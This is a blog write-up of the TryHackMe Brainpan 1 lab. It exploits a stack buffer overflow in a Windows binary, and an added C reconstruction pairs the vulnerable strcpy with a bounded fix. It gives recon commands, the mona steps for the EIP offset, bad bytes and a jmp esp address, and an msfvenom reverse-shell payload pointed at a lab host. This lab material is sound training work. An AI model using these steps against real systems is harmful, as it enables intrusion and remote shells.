WriteUp THM-Brainpan 1

Jari Laurila
4 min read · Nov 14, 2020

Brainpan is perfect for OSCP practice and has been highly recommended to complete before the exam. Exploit a buffer overflow vulnerability by analyzing a Windows executable on a Linux machine. If you get stuck on this machine, don’t give up (or look at writeups), just try harder.

This is a writeup for TryHackMe room Brainpan 1.

Reconnaissance


Let’s start with an nmap scan:

nmap -sC -sV -p- 10.10.141.199
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-10 19:16 EET
Nmap scan report for 10.10.141.199
Host is up (0.055s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
...
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)

There is a password prompt on port 9999 that we can connect to with:

nc 10.10.141.199 9999

On port 10000 there is an HTTP server. Let’s run a directory scan:

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -u http://10.10.141.199:10000 -x php,html,txt dir

Gobuster identifies a single directory, /bin, containing a single file, brainpan.exe. Let’s open it in Cutter and examine it. Looking at the main program, it seems to be the same program that is running on the other port. Let’s see if we can reverse the password.

OK, this is easy as pie: just look at the _get_reply() function disassembly.

Let’s enter shitstorm into the program and see what it does. It displays access granted, but then the program exits, as it should.

So I think this calls for a buffer overflow with shellcode. Let’s see how long a string it takes to crash the program. I use a binary search over varying lengths and generate the buffers using:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 800

518 is the largest input that doesn’t crash the program.

Looking at the code it accepts up to 1000 bytes from the socket:

_recv@16(var_5b0h, &var_3f8h, 1000, 0);

Let’s figure out how big the buffer var_3f8h actually is. Since it is memset() to zero in main, I’m thinking it overflows somewhere else. Looking at the _get_reply() function, there is a strcpy() with the destination defined as

var char *dest @ ebp-0x208 # 520 dec

So the goal is to craft a buffer that fits into the 1000 bytes read from the socket but overflows the 520-byte destination, so that we control execution. Since the remote program doesn’t give us any debug info, we need to analyze the binary locally. Time to finally learn Immunity Debugger, I guess.
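The bug described above, reconstructed as an added C example (this is not the Brainpan source; the function names are assumptions, while the sizes and the password come from the disassembly quoted on this page): the 1000-byte recv() followed by an unbounded strcpy() into a 520-byte stack buffer, next to a bounded version that rejects input that does not fit.

```c
#include <stdio.h>
#include <string.h>

/* Sizes from the disassembly discussed above: recv() reads up to 1000
 * bytes and strcpy() copies into a buffer at ebp-0x208 (520 bytes). The
 * password is the one recovered from _get_reply(). */
#define RECV_MAX 1000
#define DEST_SIZE 520
#define PASSWORD "shitstorm"

/* Reconstruction of the vulnerable pattern (hypothetical names): no length
 * check sits between the 1000-byte read and the 520-byte copy, so longer
 * input overwrites the saved frame pointer and return address. Never called. */
int get_reply_vulnerable(const char *input)
{
    char dest[DEST_SIZE];
    strcpy(dest, input);                 /* unbounded copy: the overflow */
    return strcmp(dest, PASSWORD) == 0;
}

/* Hardened version: the received length is checked against the destination
 * size before any copy, and the copy itself is bounded. Returns 1 on a
 * match, 0 on a mismatch and -1 when the input does not fit. */
int get_reply_hardened(const char *input, size_t input_len)
{
    char dest[DEST_SIZE];
    if (input_len >= DEST_SIZE)          /* keep room for the NUL */
        return -1;
    memcpy(dest, input, input_len);
    dest[input_len] = '\0';
    return strcmp(dest, PASSWORD) == 0;
}

/* Feeds a full RECV_MAX-byte read of 'A's (constructed input standing in
 * for recv()) to the hardened check; returns its result (-1). */
int hardened_rejects_full_recv(void)
{
    char buf[RECV_MAX];
    memset(buf, 'A', sizeof buf);
    return get_reply_hardened(buf, sizeof buf);
}

int main(void)
{
    printf("1000 A's -> %d\n", hardened_rejects_full_recv());      /* -1 */
    printf("wrong    -> %d\n", get_reply_hardened("wrong", 5));     /*  0 */
    printf("password -> %d\n", get_reply_hardened(PASSWORD, 9));    /*  1 */
    return 0;
}
```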

Initial entry

After learning how to do buffer overflows in another TryHackMe room, Buffer Overflow Prep, it’s time to apply those skills to this binary. After opening the binary in Immunity Debugger, I set the working folder:

!mona config -set workingfolder c:\mona\%p

I then create a repeating pattern and feed it to the program:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

After the process crashes, I find the offset at which EIP is overwritten:

!mona findmsp -distance 1000

Now we know the EIP offset needs to be 524. Confirm this with a test buffer and verify that EIP reads 42424242 (see below for the final exploit code):

offset = 524
overflow = "A" * offset
retn = "BBBB"

Next we need to figure out which characters cannot appear in the payload. We already know the zero byte is out of the question, so let’s test with that one excluded first.

Create a bytearray in mona:

!mona bytearray -b "\x00"

Use the same array (the badchars array in the exploit code) as the payload in the Python script, and after the crash check for further bad bytes starting at the ESP address:

!mona compare -f c:\mona\brainpan\bytearray.bin -a 0023F920

There are no more bad bytes, so what’s left is to find a jump address that transfers execution to our payload. We could point EIP at the stack directly, but an address containing a zero byte would not be copied over, so use mona to find a jump address:

!mona jmp -r esp -cpb "\x00"

This returns a single address:

Log data, item 3
Address=311712F3
Message= 0x311712f3 : jmp esp | {PAGE_EXECUTE_READ} [brainpan.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\Jari\Desktop\brainpan.exe)

Next we craft the reverse shell payload.

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.108.247 LPORT=4444 EXITFUNC=thread -b "\x00" -f py

And finally combine everything into the exploit program:

By running this we get a reverse shell to the box.
